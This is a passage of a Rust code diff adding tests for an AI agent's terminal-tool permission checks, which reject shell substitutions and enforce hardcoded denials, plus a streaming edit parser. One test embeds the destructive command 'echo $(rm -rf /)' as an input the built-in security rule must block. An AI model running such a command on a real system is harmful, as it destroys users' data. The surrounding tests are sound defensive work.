settings.tool_permissions.default = settings::ToolPermissionMode::Confirm; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $HOME".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let result = task.await; + let error = result.expect_err("expected invalid terminal command to be rejected"); + assert!( + error.contains("does not allow shell substitutions or interpolations"), + "expected explicit invalid-command message, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "terminal should not be created for invalid commands" + ); + assert!( + !matches!( + rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) + ), + "invalid command should not request authorization" + ); + assert!( + !matches!( + rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallUpdate( + acp_thread::ToolCallUpdate::UpdateFields(_) + ))) + ), + "invalid command should not emit a terminal card update" + ); + } + + #[gpui::test] + async fn test_run_allows_invalid_substitution_in_unconditional_allow_all_mode( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $HOME".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "expected terminal content update in unconditional allow-all mode" + ); + + let result = task + .await + .expect("command should proceed in unconditional allow-all mode"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created exactly once" + ); + assert!( + !result.contains("could not be approved"), + "unexpected invalid-command rejection output: {result}" + ); + } + + #[gpui::test] + async fn test_run_hardcoded_denial_still_wins_in_unconditional_allow_all_mode( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default() + .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx)) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $(rm -rf /)".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let error = task + .await + .expect_err("hardcoded denial should override unconditional allow-all"); + assert!( + error.contains("built-in security rule"), + "expected hardcoded denial message, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "hardcoded denial should prevent terminal creation" + ); + assert!( + !matches!( + rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) + ), + "hardcoded denial should not request authorization" + ); + } + + #[gpui::test] + async fn test_run_env_prefixed_allow_pattern_is_used_end_to_end(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^PAGER=blah\s+git\s+log(\s|$)", false) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=blah git log --oneline".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "expected terminal content update for matching env-prefixed allow rule" + ); + + let result = task + .await + .expect("expected env-prefixed command to be allowed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created for allowed env-prefixed command" + ); + assert!( + result.contains("command output") || result.contains("Command executed successfully."), + "unexpected terminal result: {result}" + ); + } + + #[gpui::test] + async fn test_run_old_anchored_git_pattern_no_longer_auto_allows_env_prefix( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Confirm), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^git\b", false).unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let _task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=blah git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let _auth = rx.expect_authorization().await; + assert!( + environment.terminal_creation_count() == 0, + "confirm flow should not create terminal before authorization" + ); + } + + #[test] + fn test_terminal_tool_description_mentions_forbidden_substitutions() { + let description = ::description().to_string(); + + assert!( + description.contains("$VAR"), + "missing $VAR example: {description}" + ); + assert!( + description.contains("${VAR}"), + "missing ${{VAR}} example: {description}" + ); + assert!( + description.contains("$(...)"), + "missing $(...) example: {description}" + ); + assert!( + description.contains("backticks"), + "missing backticks example: {description}" + ); + assert!( + description.contains("$((...))"), + "missing $((...)) example: {description}" + ); + assert!( + description.contains("<(...)") && description.contains(">(...)"), + "missing process substitution examples: {description}" + ); + } + + #[test] + fn test_terminal_tool_input_schema_mentions_forbidden_substitutions() { + let schema = ::input_schema( + language_model::LanguageModelToolSchemaFormat::JsonSchema, + ); + let schema_json = serde_json::to_value(schema).expect("schema should serialize"); + let schema_text = schema_json.to_string(); + + assert!( + schema_text.contains("$VAR"), + "missing $VAR example: {schema_text}" + ); + assert!( + schema_text.contains("${VAR}"), + "missing ${{VAR}} example: {schema_text}" + ); + assert!( + schema_text.contains("$(...)"), + "missing $(...) example: {schema_text}" + ); + assert!( + schema_text.contains("backticks"), + "missing backticks example: {schema_text}" + ); + assert!( + schema_text.contains("$((...))"), + "missing $((...)) example: {schema_text}" + ); + assert!( + schema_text.contains("<(...)") && schema_text.contains(">(...)"), + "missing process substitution examples: {schema_text}" + ); + } + + async fn assert_rejected_before_terminal_creation( + command: &str, + cx: &mut gpui::TestAppContext, + ) { + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default() + .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx)) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Confirm; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: command.to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let result = task.await; + let error = result.unwrap_err(); + assert!( + error.contains("does not allow shell substitutions or interpolations"), + "command {command:?} should be rejected with substitution message, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "no terminal should be created for rejected command {command:?}" + ); + assert!( + !matches!( + rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) + ), + "rejected command {command:?} should not request authorization" + ); + } + + #[gpui::test] + async fn test_rejects_variable_expansion(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo ${HOME}", cx).await; + } + + #[gpui::test] + async fn test_rejects_positional_parameter(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $1", cx).await; + } + + #[gpui::test] + async fn test_rejects_special_parameter_question(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $?", cx).await; + } + + #[gpui::test] + async fn test_rejects_special_parameter_dollar(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $$", cx).await; + } + + #[gpui::test] + async fn test_rejects_special_parameter_at(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $@", cx).await; + } + + #[gpui::test] + async fn test_rejects_command_substitution_dollar_parens(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $(whoami)", cx).await; + } + + #[gpui::test] + async fn test_rejects_command_substitution_backticks(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo `whoami`", cx).await; + } + + #[gpui::test] + async fn test_rejects_arithmetic_expansion(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $((1 + 1))", cx).await; + } + + #[gpui::test] + async fn test_rejects_process_substitution_input(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("cat <(ls)", cx).await; + } + + #[gpui::test] + async fn test_rejects_process_substitution_output(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("ls >(cat)", cx).await; + } + + #[gpui::test] + async fn test_rejects_env_prefix_with_variable(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("PAGER=$HOME git log", cx).await; + } + + #[gpui::test] + async fn test_rejects_env_prefix_with_command_substitution(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("PAGER=$(whoami) git log", cx).await; + } + + #[gpui::test] + async fn test_rejects_env_prefix_with_brace_expansion(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation( + "GIT_SEQUENCE_EDITOR=${EDITOR} git rebase -i HEAD~2", + cx, + ) + .await; + } + + #[gpui::test] + async fn test_rejects_multiline_with_forbidden_on_second_line(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo ok\necho $HOME", cx).await; + } + + #[gpui::test] + async fn test_rejects_multiline_with_forbidden_mixed(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("PAGER=less git log\necho $(whoami)", cx).await; + } + + #[gpui::test] + async fn test_rejects_nested_command_substitution(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $(cat $(whoami).txt)", cx).await; + } + + #[gpui::test] + async fn test_allow_all_terminal_specific_default_with_empty_patterns( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Allow), + always_allow: vec![], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $(whoami)".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "terminal-specific allow-all should bypass substitution rejection" + ); + + let result = task + .await + .expect("terminal-specific allow-all should let the command proceed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created exactly once" + ); + assert!( + !result.contains("could not be approved"), + "unexpected rejection output: {result}" + ); + } + + #[gpui::test] + async fn test_env_prefix_pattern_rejects_different_value(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^PAGER=blah\s+git\s+log(\s|$)", false) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, _rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=other git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let error = task + .await + .expect_err("different env-var value should not match allow pattern"); + assert!( + error.contains("could not be approved") + || error.contains("denied") + || error.contains("disabled"), + "expected denial for mismatched env value, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "terminal should not be created for non-matching env value" + ); + } + + #[gpui::test] + async fn test_env_prefix_multiple_assignments_preserved_in_order( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^A=1\s+B=2\s+git\s+log(\s|$)", false) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "A=1 B=2 git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "multi-assignment pattern should match and produce terminal content" + ); + + let result = task + .await + .expect("multi-assignment command matching pattern should be allowed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created for matching multi-assignment command" + ); + assert!( + result.contains("command output") || result.contains("Command executed successfully."), + "unexpected terminal result: {result}" + ); + } + + #[gpui::test] + async fn test_env_prefix_quoted_whitespace_value_matches_only_with_quotes_in_pattern( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new( + r#"^PAGER="less\ -R"\s+git\s+log(\s|$)"#, + false, + ) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=\"less -R\" git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "quoted whitespace value should match pattern with quoted form" + ); + + let result = task + .await + .expect("quoted whitespace env value matching pattern should be allowed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created for matching quoted-value command" + ); + assert!( + result.contains("command output") || result.contains("Command executed successfully."), + "unexpected terminal result: {result}" + ); + } } diff --git a/crates/agent/src/tools/tool_edit_parser.rs b/crates/agent/src/tools/tool_edit_parser.rs new file mode 100644 index 0000000000000000000000000000000000000000..86f249ff34eb13b43209331227f624d740ab33af --- /dev/null +++ b/crates/agent/src/tools/tool_edit_parser.rs @@ -0,0 +1,1016 @@ +use smallvec::SmallVec; + +use crate::{Edit, PartialEdit}; + +/// Events emitted by `ToolEditParser` as tool call input streams in. +#[derive(Debug, PartialEq, Eq)] +pub enum ToolEditEvent { + /// A chunk of `old_text` for an edit operation. + OldTextChunk { + edit_index: usize, + chunk: String, + done: bool, + }, + /// A chunk of `new_text` for an edit operation. + NewTextChunk { + edit_index: usize, + chunk: String, + done: bool, + }, + /// A chunk of content for write/overwrite mode. + ContentChunk { chunk: String }, +} + +/// Tracks the streaming state of a single edit to detect deltas. +#[derive(Default, Debug)] +struct EditStreamState { + old_text_emitted_len: usize, + old_text_done: bool, + new_text_emitted_len: usize, + new_text_done: bool, +} + +/// Converts incrementally-growing tool call JSON into a stream of chunk events. +/// +/// The tool call streaming infrastructure delivers partial JSON objects where +/// string fields grow over time. This parser compares consecutive partials, +/// computes the deltas, and emits `ToolEditEvent`s that downstream pipeline +/// stages (`StreamingFuzzyMatcher` for old_text, `StreamingDiff` for new_text) +/// can consume incrementally. +/// +/// Because partial JSON comes through a fixer (`partial-json-fixer`) that +/// closes incomplete escape sequences, a string can temporarily contain wrong +/// trailing characters (e.g. a literal `\` instead of `\n`). We handle this +/// by holding back trailing backslash characters in non-finalized chunks: if +/// a partial string ends with `\` (0x5C), that byte is not emitted until the +/// next partial confirms or corrects it. This avoids feeding corrupted bytes +/// to downstream consumers. +#[derive(Default, Debug)] +pub struct ToolEditParser { + edit_states: Vec, + content_emitted_len: usize, +} + +impl ToolEditParser { + /// Push a new set of partial edits (from edit mode) and return any events. + /// + /// Each call should pass the *entire current* edits array as seen in the + /// latest partial input. The parser will diff it against its internal state + /// to produce only the new events. + pub fn push_edits(&mut self, edits: &[PartialEdit]) -> SmallVec<[ToolEditEvent; 4]> { + let mut events = SmallVec::new(); + + for (index, partial) in edits.iter().enumerate() { + if index >= self.edit_states.len() { + // A new edit appeared — finalize the previous one if there was one. + if let Some(previous) = self.finalize_previous_edit(index) { + events.extend(previous); + } + self.edit_states.push(EditStreamState::default()); + } + + let state = &mut self.edit_states[index]; + + // Process old_text changes. + if let Some(old_text) = &partial.old_text + && !state.old_text_done + { + if partial.new_text.is_some() { + // new_text appeared, so old_text is done — emit everything. + let start = state.old_text_emitted_len.min(old_text.len()); + let chunk = normalize_done_chunk(old_text[start..].to_string()); + state.old_text_done = true; + state.old_text_emitted_len = old_text.len(); + events.push(ToolEditEvent::OldTextChunk { + edit_index: index, + chunk, + done: true, + }); + } else { + let safe_end = safe_emit_end_for_edit_text(old_text); + + if safe_end > state.old_text_emitted_len { + let chunk = old_text[state.old_text_emitted_len..safe_end].to_string(); + state.old_text_emitted_len = safe_end; + events.push(ToolEditEvent::OldTextChunk { + edit_index: index, + chunk, + done: false, + }); + } + } + } + + // Process new_text changes. + if let Some(new_text) = &partial.new_text + && !state.new_text_done + { + let safe_end = safe_emit_end_for_edit_text(new_text); + + if safe_end > state.new_text_emitted_len { + let chunk = new_text[state.new_text_emitted_len..safe_end].to_string(); + state.new_text_emitted_len = safe_end; + events.push(ToolEditEvent::NewTextChunk { + edit_index: index, + chunk, + done: false, + }); + } + } + } + + events + } + + /// Push new content and return any events. + /// + /// Each call should pass the *entire current* content string. The parser + /// will diff it against its internal state to emit only the new chunk. + pub fn push_content(&mut self, content: &str) -> SmallVec<[ToolEditEvent; 1]> { + let mut events = SmallVec::new(); + + let safe_end = safe_emit_end(content); + if safe_end > self.content_emitted_len { + let chunk = content[self.content_emitted_len..safe_end].to_string(); + self.content_emitted_len = safe_end; + events.push(ToolEditEvent::ContentChunk { chunk }); + } + + events + } + + /// Finalize all edits with the complete input. This emits `done: true` + /// events for any in-progress old_text or new_text that hasn't been + /// finalized yet. + /// + /// `final_edits` should be the fully deserialized final edits array. The + /// parser compares against its tracked state and emits any remaining deltas + /// with `done: true`. + pub fn finalize_edits(&mut self, edits: &[Edit]) -> SmallVec<[ToolEditEvent; 4]> { + let mut events = SmallVec::new(); + + for (index, edit) in edits.iter().enumerate() { + if index >= self.edit_states.len() { + // This edit was never seen in partials — emit it fully. + if let Some(previous) = self.finalize_previous_edit(index) { + events.extend(previous); + } + self.edit_states.push(EditStreamState::default()); + } + + let state = &mut self.edit_states[index]; + + if !state.old_text_done { + let start = state.old_text_emitted_len.min(edit.old_text.len()); + let chunk = normalize_done_chunk(edit.old_text[start..].to_string()); + state.old_text_done = true; + state.old_text_emitted_len = edit.old_text.len(); + events.push(ToolEditEvent::OldTextChunk { + edit_index: index, + chunk, + done: true, + }); + } + + if !state.new_text_done { + let start = state.new_text_emitted_len.min(edit.new_text.len()); + let chunk = normalize_done_chunk(edit.new_text[start..].to_string()); + state.new_text_done = true; + state.new_text_emitted_len = edit.new_text.len(); + events.push(ToolEditEvent::NewTextChunk { + edit_index: index, + chunk, + done: true, + }); + } + } + + events + } + + /// Finalize content with the complete input. + pub fn finalize_content(&mut self, content: &str) -> SmallVec<[ToolEditEvent; 1]> { + let mut events = SmallVec::new(); + + let start = self.content_emitted_len.min(content.len()); + if content.len() > start { + let chunk = content[start..].to_string(); + self.content_emitted_len = content.len(); + events.push(ToolEditEvent::ContentChunk { chunk }); + } + + events + } + + /// When a new edit appears at `index`, finalize the edit at `index - 1` + /// by emitting a `NewTextChunk { done: true }` if it hasn't been finalized. + fn finalize_previous_edit(&mut self, new_index: usize) -> Option> { + if new_index == 0 || self.edit_states.is_empty() { + return None; + } + + let previous_index = new_index - 1; + if previous_index >= self.edit_states.len() { + return None; + } + + let state = &mut self.edit_states[previous_index]; + let mut events = SmallVec::new(); + + // If old_text was never finalized, finalize it now with an empty done chunk. + if !state.old_text_done { + state.old_text_done = true; + events.push(ToolEditEvent::OldTextChunk { + edit_index: previous_index, + chunk: String::new(), + done: true, + }); + } + + // Emit a done event for new_text if not already finalized. + if !state.new_text_done { + state.new_text_done = true; + events.push(ToolEditEvent::NewTextChunk { + edit_index: previous_index, + chunk: String::new(), + done: true, + }); + } + + Some(events) + } +} + +/// Returns the byte position up to which it is safe to emit from a partial +/// string. If the string ends with a backslash (`\`, 0x5C), that byte is +/// held back because it may be an artifact of the partial JSON fixer closing +/// an incomplete escape sequence (e.g. turning a half-received `\n` into `\\`). +/// The next partial will reveal the correct character. +fn safe_emit_end(text: &str) -> usize { + if text.as_bytes().last() == Some(&b'\\') { + text.len() - 1 + } else { + text.len() + } +} + +fn safe_emit_end_for_edit_text(text: &str) -> usize { + let safe_end = safe_emit_end(text); + if safe_end > 0 && text.as_bytes()[safe_end - 1] == b'\n' { + safe_end - 1 + } else { + safe_end + } +} + +fn normalize_done_chunk(mut chunk: String) -> String { + if chunk.ends_with('\n') { + chunk.pop(); + } + chunk +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_single_edit_streamed_incrementally() { + let mut parser = ToolEditParser::default(); + + // old_text arrives in chunks: "hell" → "hello w" → "hello world" + let events = parser.push_edits(&[PartialEdit { + old_text: Some("hell".into()), + new_text: None, + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "hell".into(), + done: false, + }] + ); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("hello w".into()), + new_text: None, + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "o w".into(), + done: false, + }] + ); + + // new_text appears → old_text finalizes + let events = parser.push_edits(&[PartialEdit { + old_text: Some("hello world".into()), + new_text: Some("good".into()), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "orld".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "good".into(), + done: false, + }, + ] + ); + + // new_text grows + let events = parser.push_edits(&[PartialEdit { + old_text: Some("hello world".into()), + new_text: Some("goodbye world".into()), + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "bye world".into(), + done: false, + }] + ); + + // Finalize + let events = parser.finalize_edits(&[Edit { + old_text: "hello world".into(), + new_text: "goodbye world".into(), + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "".into(), + done: true, + }] + ); + } + + #[test] + fn test_done_chunks_strip_trailing_newline() { + let mut parser = ToolEditParser::default(); + + let events = parser.finalize_edits(&[Edit { + old_text: "before\n".into(), + new_text: "after\n".into(), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "before".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "after".into(), + done: true, + }, + ] + ); + } + + #[test] + fn 